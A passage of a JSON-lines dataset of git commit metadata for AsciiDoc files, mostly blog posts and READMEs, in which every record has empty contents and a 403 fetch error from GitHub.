csearch,truemped\/elasticsearch,kalburgimanjunath\/elasticsearch,Charlesdong\/elasticsearch,martinstuga\/elasticsearch,MichaelLiZhou\/elasticsearch,yynil\/elasticsearch,scottsom\/elasticsearch,wittyameta\/elasticsearch,gmarz\/elasticsearch,rento19962\/elasticsearch,MjAbuz\/elasticsearch,Helen-Zhao\/elasticsearch,C-Bish\/elasticsearch,liweinan0423\/elasticsearch,mikemccand\/elasticsearch,apepper\/elasticsearch,adrianbk\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,Collaborne\/elasticsearch,polyfractal\/elasticsearch,truemped\/elasticsearch,karthikjaps\/elasticsearch,btiernay\/elasticsearch,nellicus\/elasticsearch,tebriel\/elasticsearch,ZTE-PaaS\/elasticsearch,kaneshin\/elasticsearch,areek\/elasticsearch,Rygbee\/elasticsearch,iacdingping\/elasticsearch,socialrank\/elasticsearch,nezirus\/elasticsearch,lydonchandra\/elasticsearch,jeteve\/elasticsearch,nomoa\/elasticsearch,rento19962\/elasticsearch,onegambler\/elasticsearch,Brijeshrpatel9\/elasticsearch,mjason3\/elasticsearch,obourgain\/elasticsearch,nellicus\/elasticsearch,MetSystem\/elasticsearch,nazarewk\/elasticsearch,queirozfcom\/elasticsearch,hydro2k\/elasticsearch,markwalkom\/elasticsearch,glefloch\/elasticsearch,slavau\/elasticsearch,rmuir\/elasticsearch,sneivandt\/elasticsearch,sc0ttkclark\/elasticsearch,pranavraman\/elasticsearch,gmarz\/elasticsearch,knight1128\/elasticsearch,a2lin\/elasticsearch,mm0\/elasticsearch,sneivandt\/elasticsearch,infusionsoft\/e
lasticsearch,onegambler\/elasticsearch,girirajsharma\/elasticsearch,mnylen\/elasticsearch,snikch\/elasticsearch,MisterAndersen\/elasticsearch,mgalushka\/elasticsearch,JSCooke\/elasticsearch,jimczi\/elasticsearch,YosuaMichael\/elasticsearch,MichaelLiZhou\/elasticsearch,Brijeshrpatel9\/elasticsearch,MisterAndersen\/elasticsearch,andrejserafim\/elasticsearch,a2lin\/elasticsearch,winstonewert\/elasticsearch,vroyer\/elasticassandra,LewayneNaidoo\/elasticsearch,tahaemin\/elasticsearch,jango2015\/elasticsearch,GlenRSmith\/elasticsearch,zkidkid\/elasticsearch,KimTaehee\/elasticsearch,wimvds\/elasticsearch,Siddartha07\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,pablocastro\/elasticsearch,LewayneNaidoo\/elasticsearch,gingerwizard\/elasticsearch,tkssharma\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,huanzhong\/elasticsearch,hydro2k\/elasticsearch,weipinghe\/elasticsearch,wbowling\/elasticsearch,AndreKR\/elasticsearch,markharwood\/elasticsearch,masterweb121\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ESamir\/elasticsearch,jpountz\/elasticsearch,hafkensite\/elasticsearch,wittyameta\/elasticsearch,strapdata\/elassandra5-rc,alexshadow007\/elasticsearch,YosuaMichael\/elasticsearch,drewr\/elasticsearch,sposam\/elasticsearch,girirajsharma\/elasticsearch,slavau\/elasticsearch,geidies\/elasticsearch,sc0ttkclark\/elasticsearch,bawse\/elasticsearch,tebriel\/elasticsearch,areek\/elasticsearch,nezirus\/elasticsearch,tahaemin\/elasticsearch,springning\/elasticsearch,yongminxia\/elasticsearch,himanshuag\/elasticsearch,IanvsPoplicola\/elasticsearch,martinstuga\/elasticsearch,nazarewk\/elasticsearch,tebriel\/elasticsearch,ivansun1010\/elasticsearch,ivansun1010\/elasticsearch,rento19962\/elasticsearch,mortonsykes\/elasticsearch,kenshin233\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,snikch\/elasticsearch,Shepard1212\/elasticsearch,caengcjd\/elasticsearch,mortonsykes\/elasticsearch,sc0ttkclark\/elasticsearch,mnylen\/elasticsearch,markharwood\/elasticsearch,fforbeck\/elasticsearch,iacdingping\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,Helen-Zhao\/elasticsearch,ricardocerq\/elasticsearch,Rygbee\/elasticsearch,gingerwizard\/elasticsearch,sdauletau\/elasticsearch,andrejserafim\/elasticsearch,umeshdangat\/elasticsearch,scottsom\/elasticsearch,mcku\/elasticsearch,ulkas\/elasticsearch,xuzha\/elasticsearch,gingerwizard\/elasticsearch,btiernay\/elasticsearch,fforbeck\/elasticsearch,F0lha\/elasticsearch,achow\/elasticsearch,rajanm\/elasticsearch,sdauletau\/elasticsearch,btiernay\/elasticsearch,kenshin233\/elasticsearch,franklanganke\/elasticsearch,wimvds\/elasticsearch,wbowling\/elasticsearch,dpursehouse\/elasticsearch,episerver\/elasticsearch,iacdingping\/elasticsearch,camilojd\/elasticsearch,KimTaehee\/elasticsearch,JervyShi\/elasticsearch,petabytedata\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,palecur\/elasticsearch,vroyer\/elasticassandra,kalburgimanjunath\/elasticsearch,obourgain\/elasticsearch,ZTE-PaaS\/elasticsearch,dongjoon-hyun\/elasticsearch,AndreKR\/elasticsearch,jango2015\/elasticsearch,wuranbo\/elasticsearch,nknize\/elasticsearch,sreeramjayan\/elasticsearch,scorpionvicky\/elasticsearch,avikurapati\/elasticsearch,nilabhsagar\/elasticsearch,elancom\/elasticsearch,vroyer\/elassandra,achow\/elasticsearch,Uiho\/elasticsearch,mohit\/elasticsearch,JSCooke\/elasticsearch,adrianbk\/elasticsearch,henakamaMSFT\/elasticsearch,geidies\/elasticsearch,xuzh
a\/elasticsearch,mapr\/elasticsearch,mbrukman\/elasticsearch,rmuir\/elasticsearch,jpountz\/elasticsearch,diendt\/elasticsearch,KimTaehee\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nomoa\/elasticsearch,umeshdangat\/elasticsearch,camilojd\/elasticsearch,petabytedata\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,cwurm\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ckclark\/elasticsearch,ESamir\/elasticsearch,wimvds\/elasticsearch,onegambler\/elasticsearch,dpursehouse\/elasticsearch,jbertouch\/elasticsearch,hydro2k\/elasticsearch,mbrukman\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,MaineC\/elasticsearch,yongminxia\/elasticsearch,davidvgalbraith\/elasticsearch,StefanGor\/elasticsearch,pranavraman\/elasticsearch,iacdingping\/elasticsearch,elancom\/elasticsearch,rento19962\/elasticsearch,clintongormley\/elasticsearch,pozhidaevak\/elasticsearch,vingupta3\/elasticsearch,vingupta3\/elasticsearch,lzo\/elasticsearch-1,pritishppai\/elasticsearch,LeoYao\/elasticsearch,vingupta3\/elasticsearch,lmtwga\/elasticsearch,rhoml\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,F0lha\/elasticsearch,sreeramjayan\/elasticsearch,myelin\/elasticsearch,Shepard1212\/elasticsearch,spiegela\/elasticsearch,KimTaehee\/elasticsearch,MetSystem\/elasticsearch,vietlq\/elasticsearch,clintongormley\/elasticsearch,knight1128\/elasticsearch,truemped\/elasticsearch,awislowski\/elasticsearch,18098924759\/elasticsearch,vietlq\/elasticsearch,bawse\/elasticsearch,pablocastro\/elasticsearch,episerver\/elasticsearch,trangvh\/elasticsearch,F0lha\/elasticsearch,nezirus\/elasticsearch,petabytedata\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pranavraman\/elasticsearch,i-am-Nathan\/elasticsearch,naveenhooda2000\/elasticsearch","old_file":"docs\/plugins\/authors.asciidoc","new_file":"docs\/plugins\/authors.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60a3186d1daebd22d8fd798c78e4172ff6c9bcce","subject":"add short doc on android code signing","message":"add short doc on android code signing\n\nfixes #20\n","repos":"Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/Android_code_signing.adoc","new_file":"doc\/Android_code_signing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c3f0e3822ca7621e9cbbd945c07370e9066da786","subject":"Update 2011-03-10-Analyse-de-la-qualite-logicielle.adoc","message":"Update 2011-03-10-Analyse-de-la-qualite-logicielle.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-03-10-Analyse-de-la-qualite-logicielle.adoc","new_file":"_posts\/2011-03-10-Analyse-de-la-qualite-logicielle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfe5193a51763c581d36f283f46a1d28fb56627f","subject":"Update 
2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","message":"Update 2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","new_file":"_posts\/2018-06-17-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de4faa5fd1018220d956d83d253a0885a9719dc9","subject":"Add basic README","message":"Add basic README\n","repos":"miska\/octv,miska\/octv,miska\/octv","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miska\/octv.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"75879d926dbfb9f098dc7671e36402d5e247cac9","subject":"Update 2017-12-18-Moving-the-blog-to-Github-pages.adoc","message":"Update 2017-12-18-Moving-the-blog-to-Github-pages.adoc","repos":"flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io","old_file":"_posts\/2017-12-18-Moving-the-blog-to-Github-pages.adoc","new_file":"_posts\/2017-12-18-Moving-the-blog-to-Github-pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flipswitchingmonkey\/flipswitchingmonkey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5deda56d6b41cd51805cc393d787402da4c3e224","subject":"Update 2017-06-18-Titreyen-Ars-Altinda-Vals.adoc","message":"Update 2017-06-18-Titreyen-Ars-Altinda-Vals.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-06-18-Titreyen-Ars-Altinda-Vals.adoc","new_file":"_posts\/2017-06-18-Titreyen-Ars-Altinda-Vals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a0a27c05873e68b1fa73c69ba71cd6d134fc5ec","subject":"Create README.adoc","message":"Create README.adoc","repos":"juangon\/prototypes,aparnachaudhary\/prototypes","old_file":"dockerfiles\/PostgreSQL9.3\/README.adoc","new_file":"dockerfiles\/PostgreSQL9.3\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/prototypes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ada679a03242464e623dbbd83b28a1ca5782db5","subject":"Update 2015-11-25-TEST.adoc","message":"Update 2015-11-25-TEST.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-25-TEST.adoc","new_file":"_posts\/2015-11-25-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ec4250e2ae8a0b0dc3e1ec5c3dbbf4f65f88bcd","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"ziodave\/hydra-java,dschulten\/hydra-java,ceefour\/hydra-java","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dschulten\/hydra-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1344cb5d0a347d3bfa5ed9775c317d156113e624","subject":"Remove HTML Tags","message":"Remove HTML Tags\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c9c6869fe1828b3dff4db5dbe33f774779a7948","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b0adb10d30a2506ef8e1fb97119f668ef8e374","subject":"Update 2017-02-05-Reviews-on-F-resources.adoc","message":"Update 2017-02-05-Reviews-on-F-resources.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2017-02-05-Reviews-on-F-resources.adoc","new_file":"_posts\/2017-02-05-Reviews-on-F-resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e68fd3478ae8e8cb52e5f5e2b82d962cad36453","subject":"Update 2015-08-13-Welcome-on-board.adoc","message":"Update 2015-08-13-Welcome-on-board.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-08-13-Welcome-on-board.adoc","new_file":"_posts\/2015-08-13-Welcome-on-board.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a7ed5bbb5322b793a8a0a6bc701cd674dbde109","subject":"Update 2016-02-22-Ground-Zero-Pt-1.adoc","message":"Update 2016-02-22-Ground-Zero-Pt-1.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-22-Ground-Zero-Pt-1.adoc","new_file":"_posts\/2016-02-22-Ground-Zero-Pt-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f17a474b6b312c24bf3693c5bcda51d8c59f65a","subject":"Update 
2016-08-15-Wechat.adoc","message":"Update 2016-08-15-Wechat.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-15-Wechat.adoc","new_file":"_posts\/2016-08-15-Wechat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9df62df4f56909c11e7daf220a4f92122daf95a5","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d380503b04c459d1958c0f52c0e54ed1545a1099","subject":"Create README.adoc","message":"Create README.adoc","repos":"nintaitrading-eu\/ledgerplot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nintaitrading-eu\/ledgerplot.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"cbc42c0410fb2df7a7fa5e0f761ae24e568a2b9d","subject":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","message":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","repos":"Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam","old_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"16400560f5f035a4dfb5cc2f3caa99cdbc1e0680","subject":"Update 2016-09-innovation-engineer-aruaru.adoc","message":"Update 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f6792cdfbf1d90179e2d5c94ef9bf75735c8fc","subject":"adding AWS credentials","message":"adding AWS 
credentials\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8258d9687355477401d7ae88a69d9fa769f2199","subject":"Add CCR template","message":"Add CCR template\n\nThis template combines the best of the wiki process as well as\nthe PROJECT and EXPERIMENT documents, but removes those items\nthat are too onerous for a change control request. This also\ncomplies with the Paperwork Reduction Act of 1980.\n","repos":"lookout\/styleguides","old_file":"docs\/CCR.asciidoc","new_file":"docs\/CCR.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lookout\/styleguides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fea47cfe878758bb8d2986ad5e2e1f8ce45bfa80","subject":"Update 2019-01-31-draft-embeded-math-formula.adoc","message":"Update 2019-01-31-draft-embeded-math-formula.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-draft-embeded-math-formula.adoc","new_file":"_posts\/2019-01-31-draft-embeded-math-formula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff91de475b4f35e987e0ff8b58712f23d805212c","subject":"Update index.adoc","message":"Update index.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a727e627467f047766278481ed26848d32a080a6","subject":"Update 2017-08-17-Serverless-Framework-Type-Script-1.adoc","message":"Update 2017-08-17-Serverless-Framework-Type-Script-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-1.adoc","new_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35fafc11322de94d0d129c17696301e06e1905d0","subject":"Update 2015-06-01-Es-geht-weiter.adoc","message":"Update 2015-06-01-Es-geht-weiter.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-01-Es-geht-weiter.adoc","new_file":"_posts\/2015-06-01-Es-geht-weiter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8178e0a186c6390a0dc44efdafb0b649fbb96706","subject":"Renamed '_posts\/2017-10-08-Privacy-Polocy.adoc' to '_posts\/2017-01-01-Privacy-Policy.adoc'","message":"Renamed '_posts\/2017-10-08-Privacy-Polocy.adoc' to '_posts\/2017-01-01-Privacy-Policy.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-01-01-Privacy-Policy.adoc","new_file":"_posts\/2017-01-01-Privacy-Policy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6434eb62ec72dc6313ffe65307a9ff35cb2238f","subject":"Update 2016-04-12-Codificacion-de-datos.adoc","message":"Update 2016-04-12-Codificacion-de-datos.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_file":"_posts\/2016-04-12-Codificacion-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e1113a9d946072747fe87f25ac8926d5f3a2ee5","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78ef4a908990548e83a29e16815aa1bd350aff54","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ede7f3fcf04c96b64061fb35f46ebdb4118e60ec","subject":"create post DON'T Buy The iPhone X","message":"create post DON'T Buy The iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-DONT-Buy-The-iPhone-X.adoc","new_file":"_posts\/2018-02-26-DONT-Buy-The-iPhone-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ea833036b103ca43edd4286121cdf1287d4cf7d","subject":"Update 2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","message":"Update 
2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","new_file":"_posts\/2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be2a9eb32c71545553ea11cb02c04132ee1fa1bb","subject":"Exc shortened","message":"Exc shortened\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70e9f1e04ed8beec58ef400f41f411eb1381fbfc","subject":"y2b create post Nikon P7700 Unboxing \\u0026 Overview","message":"y2b create post Nikon P7700 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-03-Nikon-P7700-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-05-03-Nikon-P7700-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36f93c7afba4317f3af3c001809e99ba291b6f03","subject":"Update 2015-12-23-Python-Static-Instance-variable.adoc","message":"Update 2015-12-23-Python-Static-Instance-variable.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-23-Python-Static-Instance-variable.adoc","new_file":"_posts\/2015-12-23-Python-Static-Instance-variable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"399fdb5867090440411aa191cbdf6b32d4e30a0f","subject":"Decided to leave this for another time","message":"Decided to leave this for another 